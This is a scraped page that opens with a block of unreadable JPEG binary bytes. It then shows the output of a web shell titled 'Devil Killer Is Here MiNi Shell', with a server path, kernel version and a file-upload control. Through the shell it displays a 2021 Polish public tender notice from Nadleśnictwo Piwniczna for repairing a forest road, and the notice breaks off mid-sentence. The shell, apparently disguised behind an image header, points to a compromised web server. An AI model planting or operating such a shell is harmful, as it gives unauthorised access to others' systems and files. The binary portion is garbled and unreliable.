JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210709/0010957001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00109570 z dnia 2021-07-09</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> "Remont drogi leśnej Majdan Kapuśnice nr inw. 242/771/21" </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO PIWNICZNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 350545659</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Zagrody 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Piwniczna-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-350</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 4464026</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">184464194</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">piwniczna@krakow.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://piwniczna.krakow.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> "Remont drogi leśnej Majdan Kapuśnice nr inw. 242/771/21" </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-86efa829-dfe5-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00109570</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00057920/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Remont drogi Majdan - Kapuśnice</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://platformazakupowa.pl/pn/lasy_piwniczna <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">http://platformazakupowa.pl/pn/lasy_piwniczna</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje, zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0., włączona obsługa JavaScript, zainstalowany program Adobe Acrobat Readerlub inny obsługujący format plików .pdf, Platforma działa według standardu przyjętego w<br/>komunikacji sieciowej - kodowanie UTF8, Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych<br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) informujemy, że:1) administratorem Pani/Pana danych osobowych jest<br/>Nadleśnictwo Piwniczna z siedzibą: 33-350 Piwniczna - Zdrój tel. 018 446 40 26, adres e-mail<br/>piwniczna@krakow.lasy.gov.pl2) administrator wyznaczył Inspektora Danych Osobowych, z którym<br/>można się kontaktować pod adresem e-mail: iod@comp-net.pl3) Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z<br/>przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie<br/>przetargu nieograniczonego.4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty,<br/>którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy P.Z.P.5)<br/>Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 lat od<br/>dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4<br/>lata, okres przechowywania obejmuje cały czas trwania umowy;6) obowiązek podania przez<br/>Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisanych ustawy P.Z.P., związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO.8) posiada Pani/Pan:a) na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku,<br/>gdy skorzystanie z tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku<br/>może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie<br/>zamówienia publicznego lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania<br/>o udzielenie zamówienia);b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z<br/>ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników);c) na podstawie art.<br/>18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego);d) prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO; 9) nie przysługuje Pani/Panu:a) w<br/>związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;b) prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO;c) na podstawie art. 21 RODO<br/>prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; 10) przysługuje Pani/Panu prawo<br/>wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony<br/>Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.1.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest „Remont drogi leśnej Majdan Kapuśnice nr inw. 242/771/21” polegający na odtworzeniu jej stanu pierwotnego na długości 815 mb, polegający na remoncie nawierzchni z poboczami, elementów odwodnienia drogi oraz przepustów pod koroną drogi.<br/>Szczegółowy opis przedmiotu zamówienia ("OPZ") został określony w dokumentacji projektowej tj. załączniku nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233123-7 - Roboty budowlane w zakresie dróg podrzędnych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">gwarancja jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 7.1 W postępowaniu mogą brać udział Wykonawcy, którzy nie podlegają wykluczeniu z<br/>postępowania na warunkach określonych w rozdziale 6 SWZ oraz spełniają warunki udziału w<br/>postępowaniu dotyczące: 1) zdolności do występowania w obrocie gospodarczym :Zamawiający<br/>nie stawia warunku w powyższym zakresie. 2) uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów : Zamawiający<br/>nie stawia warunku w powyższym zakresie. 3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania warunku udziału w<br/>postępowaniu w odniesieniu do warunku dot. zdolności ekonomicznej.Warunek w odniesieniu do sytuacji finansowej, zostanie spełniony, jeśli Wykonawca wykaże, że posiada środki finansowe<br/>lub zdolność kredytową nie mniejszą niż: 100 000,00 PLN (słownie: sto tysięcy 00/100 ) 4)<br/>zdolności technicznej lub zawodowej.a) Warunek ten, w zakresie doświadczenia, zostanie<br/>uznany za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie)<br/>wykonał należycie co najmniej dwa zadania polegające na budowie, przebudowie, rozbudowie<br/>lub remoncie dróg/drogi w rozumieniu ustawy z dnia 21 marca 1985 r. o drogach publicznych,<br/>lub drogi leśnej w rozumieniu ustawy o lasach Dz.U.2020.1463 t.j. o wartości nie mniejszej niż:<br/>150000,00 PLN brutto (słownie: sto pięćdziesiąt tysięcy złotych). Uwaga:Przez zamówienie<br/>wykonane należy rozumieć: zamówienia rozpoczęte i zakończone w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie). Zamówienia zakończone w ww. okresie to zamówienia, których rozpoczęcie mogło<br/>nastąpić wcześniej niż w ww. okresie. b) Warunek w zakresie osób skierowanych przez<br/>Wykonawcę do realizacji zamówienia, zostanie uznany za spełniony, jeśli Wykonawca wykaże,<br/>że dysponuje lub będzie dysponował: minimum 1 osobą pełniącą funkcję kierownika budowy posiadającą<br/>uprawnienia budowlane do kierowania robotami w specjalności drogowej co najmniej w ograniczonym zakresie posiadającej co najmniej 3 letnie doświadczenie zawodowe na stanowisku kierownika budowy lub kierownika<br/>robót, w tym pełnienie funkcji kierownika budowy lub kierownika robót w ramach posiadanej<br/>specjalności dla co najmniej jednej inwestycji (roboty budowlanej) polegającej na budowie lub<br/>remoncie drogi publicznej lub leśnej o wartości robót nie mniejszej niż 150 000,00 PLN<br/>Uprawnienia, o których mowa powyżej powinny być zgodne z ustawą Prawo budowlane oraz<br/>Rozporządzeniem Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie<br/>samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014 roku, poz. 1278). Dopuszcza<br/>się uprawnienia równoważne – dla osoby, która posiada uzyskane przed dniem wejścia w życie<br/>ustawy z dnia 7 lipca 1994 roku Prawo budowlane, uprawnienia lub stwierdzenie posiadania<br/>przygotowania zawodowego do pełnienia samodzielnych funkcji w budownictwie i zachowała<br/>uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. W przypadku wykonawców<br/>zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, na<br/>zasadach określonych w art.12a ustawy Prawo budowlane, z uwzględnieniem postanowień<br/>ustawy z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w<br/>państwach członkowskich Unii Europejskiej (tekst jednolity Dz. U. z 2020.220). Wymagane w tym<br/>punkcie okresy doświadczenia zawodowego, należy liczyć do upływu terminu składania ofert.<br/>Wymagany okres 3-letniego doświadczenia zawodowego należy rozumieć jako okres<br/>trzydziestu sześciu miesięcy wykonywania czynności w charakterze kierownika budowy/robót w<br/>trakcie realizacji robót. Dane te powinny jasno wynikać z treści wykazu osób składanego na<br/>wezwanie Zamawiającego w trybie art. 274 ust. 1. W wykazie należy podać dokładne daty<br/>(dziennych) rozpoczęcia i zakończenia nadzorowanych robót. Wykazanie różnych robót<br/>przebiegających w tym samym okresie czasu, którymi kierował specjalista zostanie<br/>potraktowane, jak wykonanie jednej roboty budowlanej w danym okresie czasu, innymi słowy<br/>przyjmuje się, iż dublujące się okresy doświadczania zawodowego nie podlegają sumowaniu.<br/>Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu<br/>polegać na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. pkt 4) lub<br/>sytuacji finansowej lub ekonomicznej (warunki wskazane w pkt. 7.1 pkt. 3) innych podmiotów<br/>niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.Wykonawca, który<br/>polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. pkt 4) lub<br/>sytuacji ekonomicznej lub finansowej (warunki wskazane w pkt. 7.1 pkt. 3)składa wraz z ofertą:<br/>1) zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych<br/>zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy<br/>potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi<br/>zasobami tych podmiotów.Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa<br/>wyżej, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby<br/>gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności: (1) zakres<br/>dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;(2) sposób i okres<br/>udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; (3) czy i w jakim zakresie podmiot udostępniający<br/>zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w<br/>postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zrealizuje usługi, których wskazane zdolności dotyczą. Niewiążący wzór zobowiązania do<br/>oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia<br/>stanowi załącznik nr 7do SWZ. 2) oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. UWAGA:<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub<br/>sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. Wykonawca,<br/>który polega na zdolnościach technicznych lub zawodowych (warunki wskazane w pkt 7.1. pkt 4)<br/>lub sytuacji finansowej (warunki wskazane w pkt 7.1.pkt 3) na zasadach określonych w art. 118<br/>PZP zobowiązany będzie do przedstawienia podmiotowych środków dowodowych, o których<br/>mowa w pkt 9.1. lit d i e) SWZ, dotyczących tych podmiotów, potwierdzających, że nie zachodzą<br/>wobec tych podmiotów podstawy wykluczenia z postępowania. Dokumenty, o których mowa w<br/>pkt 9.1. lit d i e) wykonawca będzie obowiązany złożyć w terminie wskazanym przez<br/>Zamawiającego, nie krótszym niż 5 dni, określonym w wezwaniu wystosowanym przez<br/>Zamawiającego do wykonawcy po otwarciu ofert w trybie art Ocena spełniania warunków udziału<br/>w postępowaniu dokonana zostanie zgodnie z formułą„spełnia”/„nie spełnia”, w oparciu o<br/>informacje zawarte w oświadczeniu składanym wraz z ofertą,a następnie potwierdzonych<br/>środkami dowodowymi opisanymi w rozdziale 9 SWZ przez wykonawcę, którego oferta zostanie<br/>najwyżej oceniona. Wzór oświadczenia stanowi załącznik nr 2 do SWZ. Oceniając zdolność<br/>techniczną lub zawodową Wykonawcy, Zamawiający działając na podstawie art. 116 ust. 2 PZP<br/>może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych<br/>zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności<br/>zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia<br/>gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">d) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>Zamawiający żąda oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych<br/>przez zamawiającego w zakresie art 108 ust 1 pkt 3, 108 ust.1 pkt. 4, 108 ust.1 pkt.5, 108 ust.1 pkt.6 ,<br/>109 ust 5,7. (niewiążący wzór oświadczenia stanowi załącznik nr 6 do SWZ)e)Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. f) informacji banku lub spółdzielczej<br/>kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego<br/>podmiotowych środków 